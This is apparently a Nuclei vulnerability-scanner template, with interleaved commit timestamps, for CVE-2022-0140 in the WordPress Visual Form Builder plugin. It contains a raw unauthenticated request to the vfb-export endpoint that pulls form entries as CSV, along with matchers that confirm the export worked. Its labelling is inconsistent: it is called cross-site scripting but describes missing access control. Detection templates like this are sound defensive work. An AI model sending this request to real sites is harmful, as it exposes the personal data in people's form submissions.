2022-04-24 10:04:42 +00:00
id : CVE-2022-0140
info :
2022-08-29 13:55:23 +00:00
name : WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting
2022-04-24 10:04:42 +00:00
author : random-robbie
2022-04-24 10:05:04 +00:00
severity : medium
2022-04-24 10:04:42 +00:00
description : |
2022-08-29 13:55:23 +00:00
WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.
2022-04-24 10:04:42 +00:00
reference :
- https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336
2022-06-14 10:58:58 +00:00
- https://www.fortiguard.com/zeroday/FG-VD-21-082
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/cve-2022-0140
2022-04-24 10:05:04 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-06-14 10:58:58 +00:00
cvss-score : 5.3
2022-04-24 10:05:04 +00:00
cve-id : CVE-2022-0140
cwe-id : CWE-200
2023-07-11 19:49:27 +00:00
epss-score : 0.00851
cpe : cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : vfbpro
product : visual_form_builder
tags : wpscan,cve,cve2022,xss,wordpress
2022-04-24 10:04:42 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-24 10:04:42 +00:00
- raw :
- |
POST /wp-admin/admin.php?page=vfb-export HTTP/1.1
Host : {{Hostname}}
Referer : {{RootURL}}/wp-admin/admin.php?page=vfb-export
Content-Type : application/x-www-form-urlencoded
Origin : {{RootURL}}
vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File
matchers-condition : and
matchers :
- type : word
words :
- '"Date Submitted"'
- '"Entries ID"'
condition : and
- type : status
status :
2022-08-29 13:55:23 +00:00
- 200